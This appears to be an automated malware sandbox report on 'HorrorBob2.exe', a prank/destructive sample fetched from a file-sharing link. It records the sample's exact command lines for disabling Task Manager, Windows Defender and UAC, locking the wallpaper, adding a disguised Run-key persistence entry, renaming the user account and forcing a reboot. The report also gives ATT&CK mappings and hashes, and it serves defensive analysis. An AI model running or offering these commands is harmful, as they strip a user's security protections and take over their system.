Analysis
-
max time kernel
21s -
max time network
23s -
platform
windows10-2004_x64 -
resource
win10v2004-20250502-en -
resource tags
arch:x64arch:x86image:win10v2004-20250502-enlocale:en-usos:windows10-2004-x64system -
submitted
19/05/2025, 15:18
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://gofile.io/d/ecYbbf
Resource
win10v2004-20250502-en
Errors
General
-
Target
https://gofile.io/d/ecYbbf
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
UAC bypass 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file 1 IoCs
flow pid Process 50 1916 chrome.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000\Control Panel\International\Geo\Nation HorrorBob2.exe -
Executes dropped EXE 2 IoCs
pid Process 5004 HorrorBob2.exe 4392 Service64.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Acer NitroSense Update = "C:\\Service64\\Service64.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 11 api.gofile.io 17 api.gofile.io -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000\Control Panel\Desktop\Wallpaper = "c:\\Service64\\blood.bmp" reg.exe -
resource yara_rule behavioral1/files/0x000b00000002410f-62.dat upx behavioral1/memory/5004-85-0x0000000000400000-0x000000000132F000-memory.dmp upx behavioral1/files/0x000d000000024114-119.dat upx behavioral1/memory/4392-125-0x0000000000400000-0x00000000012E3000-memory.dmp upx behavioral1/memory/5004-126-0x0000000000400000-0x000000000132F000-memory.dmp upx behavioral1/memory/4392-146-0x0000000000400000-0x00000000012E3000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shutdown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Service64.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HorrorBob2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Modifies data under HKEY_USERS 17 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "56" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133921415366163678" chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe -
Modifies registry key 1 TTPs 3 IoCs
pid Process 4456 reg.exe 3732 reg.exe 2344 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 5112 chrome.exe 5112 chrome.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeShutdownPrivilege 5112 chrome.exe Token: SeCreatePagefilePrivilege 5112 chrome.exe Token: SeShutdownPrivilege 5112 chrome.exe Token: SeCreatePagefilePrivilege 5112 chrome.exe Token: SeShutdownPrivilege 5112 chrome.exe Token: SeCreatePagefilePrivilege 5112 chrome.exe Token: SeShutdownPrivilege 5112 chrome.exe Token: SeCreatePagefilePrivilege 5112 chrome.exe Token: SeShutdownPrivilege 5112 chrome.exe Token: SeCreatePagefilePrivilege 5112 chrome.exe Token: SeShutdownPrivilege 5112 chrome.exe Token: SeCreatePagefilePrivilege 5112 chrome.exe Token: SeShutdownPrivilege 5112 chrome.exe Token: SeCreatePagefilePrivilege 5112 chrome.exe Token: SeShutdownPrivilege 5112 chrome.exe Token: SeCreatePagefilePrivilege 5112 chrome.exe Token: SeShutdownPrivilege 5112 chrome.exe Token: SeCreatePagefilePrivilege 5112 chrome.exe Token: SeShutdownPrivilege 5112 chrome.exe Token: SeCreatePagefilePrivilege 5112 chrome.exe Token: SeShutdownPrivilege 5112 chrome.exe Token: SeCreatePagefilePrivilege 5112 chrome.exe Token: SeShutdownPrivilege 5112 chrome.exe Token: SeCreatePagefilePrivilege 5112 chrome.exe Token: SeShutdownPrivilege 5112 chrome.exe Token: SeCreatePagefilePrivilege 5112 chrome.exe Token: SeShutdownPrivilege 5112 chrome.exe Token: SeCreatePagefilePrivilege 5112 chrome.exe Token: SeShutdownPrivilege 5112 chrome.exe Token: SeCreatePagefilePrivilege 5112 chrome.exe Token: SeShutdownPrivilege 5472 shutdown.exe Token: SeRemoteShutdownPrivilege 5472 shutdown.exe Token: SeShutdownPrivilege 5112 chrome.exe Token: SeCreatePagefilePrivilege 5112 chrome.exe -
Suspicious use of FindShellTrayWindow 36 IoCs
pid Process 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe 5112 chrome.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3376 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5112 wrote to memory of 5924 5112 chrome.exe 86 PID 5112 wrote to memory of 5924 5112 chrome.exe 86 PID 5112 wrote to memory of 1916 5112 chrome.exe 87 PID 5112 wrote to memory of 1916 5112 chrome.exe 87 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 6128 5112 chrome.exe 88 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91 PID 5112 wrote to memory of 4456 5112 chrome.exe 91
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://gofile.io/d/ecYbbf1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5112 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8e5a4dcf8,0x7ff8e5a4dd04,0x7ff8e5a4dd102⤵PID:5924
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1564,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2068 /prefetch:32⤵
- Downloads MZ/PE file
PID:1916
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2044,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2040 /prefetch:22⤵PID:6128
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2200,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2512 /prefetch:82⤵PID:1584
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2952,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2976 /prefetch:12⤵PID:1632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2964,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3016 /prefetch:12⤵PID:4456
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4136,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4148 /prefetch:22⤵PID:4936
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4680,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4708 /prefetch:12⤵PID:4580
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4408,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3020 /prefetch:12⤵PID:2460
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5548,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5572 /prefetch:82⤵PID:6120
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5568,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5472 /prefetch:82⤵PID:452
-
-
C:\Users\Admin\Downloads\HorrorBob2.exe"C:\Users\Admin\Downloads\HorrorBob2.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5004 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A73C.tmp\HorrorBob2.bat" "3⤵
- System Location Discovery: System Language Discovery
PID:4156 -
C:\Windows\SysWOW64\cscript.execscript prompt.vbs4⤵
- System Location Discovery: System Language Discovery
PID:1280
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2344
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f4⤵
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:4036
-
-
C:\Windows\SysWOW64\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
- System Location Discovery: System Language Discovery
PID:6052
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4456
-
-
C:\Windows\SysWOW64\reg.exeReg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
- System Location Discovery: System Language Discovery
PID:4768
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3732
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4732
-
-
C:\Windows\SysWOW64\net.exenet user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"4⤵
- System Location Discovery: System Language Discovery
PID:2756 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"5⤵
- System Location Discovery: System Language Discovery
PID:2988
-
-
-
C:\Windows\SysWOW64\shutdown.exeshutdown /r /t 004⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5472
-
-
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:5588
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:5088
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Service64\Service64.exe1⤵PID:4816
-
C:\Service64\Service64.exeC:\Service64\Service64.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4392
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3977055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:3376
Network
MITRE ATT&CK Enterprise v16
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
649B
MD5be5ee66b9f3b8e5e873e8ae3a24a9067
SHA13085fcf7a958c0e7eefc4c5dfcca19215b47e74e
SHA256f3c8e739ae743a5cc49d36d40466efa61f0e7be44e03fdd9b6c6b5b88ea83249
SHA51225298a3804aec81a821d19360e061cee4af4a8d865dce8dfcc97c5148b8b8716cd7ba295d822878f6becaa7877f429f54651bd8128d87f56f363bb4a8b2ccf67
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
10KB
MD5090b6b9eab28e5e9c783c5dd99782363
SHA19112ed481b321b35b60ead650033e01bb79d4c10
SHA256192f9f3be5f65bfdf75bf11bc907e2db9c8f971a385513f1a51e154bf8cc45ce
SHA5125a68ae0c568e4d454cfc059d38646b8a9e03f0b7c35e360416ae5e3c0c3d5c3e6a0ad2d01b913bb72bd393ee5f9ec47160e344f07a18da6dcee2986ac45b13bd
-
Filesize
10KB
MD59e53b089623a9f4f7ea7a3ba6d707304
SHA1a0454a38077118d0efc3384594b556857e8028e2
SHA25687ccb44e5066a0b7932db8e9743168f3214c4c753bfa1a0da803d307f39d87ba
SHA5128a0bdc7ff1a24654c8b9a554ce023411f406772ee7f80ce2d8f06b89431e48b21b2b450abf05452e49a42ae9d07e3f74de4c48c778867c32347dfdffd83d90bd
-
Filesize
15KB
MD56110e3e944deef222e30e13466a87806
SHA174dcd3f70e7f521aebacc4c8c119a3c51c11e7f4
SHA2565956798455cc35787313c4c31ffdc3cd5795833980ce1203d997ebbc0e941359
SHA512d72175441abe81e11de81b0b204381bb23ece86507665e9ca820c4938f6b7e9af909db803214453bf5689d62dee8090cceeb2c11813e9a64435197151abe1546
-
Filesize
79KB
MD583f20037e4fbe3212e0e1c3be63c5052
SHA199617ff735d86d26be18aee21848cf17011cd4a4
SHA256e1d826b1393205c1d6442b87fc35e47ef9fda8ccf2147b9de1c6165f47ea1b8d
SHA512364270064b63df9524447516f4008428df7aab9da3991932cc760da394526a470d500989c07b155c7111235d3c0464580f48eb750f0e35fd6593bd4a5c6b29f3
-
Filesize
80KB
MD561197b2bf7b65ddb761c9e158ba94975
SHA185b150898278139324a8a7bb4dcc64111c0d0486
SHA2560b2b8ed3ac3b40c908fb81407b389d0a15ae88ad63ac885473f041edb853d20f
SHA512e0cfd2967648b8f30a0d25dd5a83e9186dfa1d0810fd88357eacd156e57956d9fd2cd69721ff3fda83415b519c63a97066c8bf648ae3346693e27bd5d42910a1
-
Filesize
5KB
MD5b11c0b55dba339bbe3169584fa0eedd8
SHA18c201122fd73cea5d8d2aa2aa6f7c17d99b521d9
SHA256f73a510ebd7495f8432b489009aeed5ae7c945ccf68ec3baf88605aeefb2d073
SHA5128424ce9a6af67721c6df13edbfbe9e48ad1eb014e19c6952afd4158c16762cf65092e6ef459a98680673e30c86da9ba9aaf2aca309426b9237bfcf893ed40006
-
Filesize
11.4MB
MD5b53852cb556ec28efc39b986caddb791
SHA15ce0819a7b1703f67272fa0f21546d0a8b2d7b0a
SHA256ae8cd9b5396770fa3c77140246365c3c501ece718b52fd6b7faed85c26b25d2a
SHA5127da30187b939c91d045dbe9cfe8daa209d539ca865d759bde4be1c8f4f96fac5f5747ec1be1937eb00034bf531391788586c5d6c3ee93c94d88201e3a1d52599
-
Filesize
3.8MB
MD5040d29b801e3488f7aee3f9708128eea
SHA1433591a971325f7529cbb7a1d16645ff65ee10c7
SHA256fe28980c6e213619a95e5991de2062a0187fc3054418e670e1c67d3c5b6b01de
SHA51279c64fce68a58fea469bb71dd1e10a3a2c1d4dc024635be2b8e29793bab8c34ba7afd402d47cce7826279512c7906f31fed9fe986024bc03a36dc094f7629826
-
Filesize
207B
MD552ac951762c9b42fb4492dfdde2ba4ae
SHA10821a0dea46432fc4db10a2dc6312d42a872ab9f
SHA2569bc399097468bb1f2f88250cb967b3db4d34d0a7836b73f262afe2b3ad393ba3
SHA512c91cf111b92f0f3218353e4e1700270730f2cbad54ab5d8fb368c6e87168be39f0b3e5a04d66b11bc5d93d6b4c4d03711b75e29a7af87d75c14dd296ad4ad530
-
Filesize
11.9MB
MD59331b20120075b2685d3888c196f2e34
SHA11af7d3dc4576ef8aaa06fa3199cf422b7657950b
SHA25698a804d373c7e0e4f80155df20358436e066ecf31c522c31df2ba46923ac68c2
SHA51283636067d46b1362a6e0e5af56222d170d337fa7b0c4048b8f04c9df0ca35c3634a7254e6226886b00f9894e4353d6ac6b2e4e760bab320058cebe37c7c0cd7b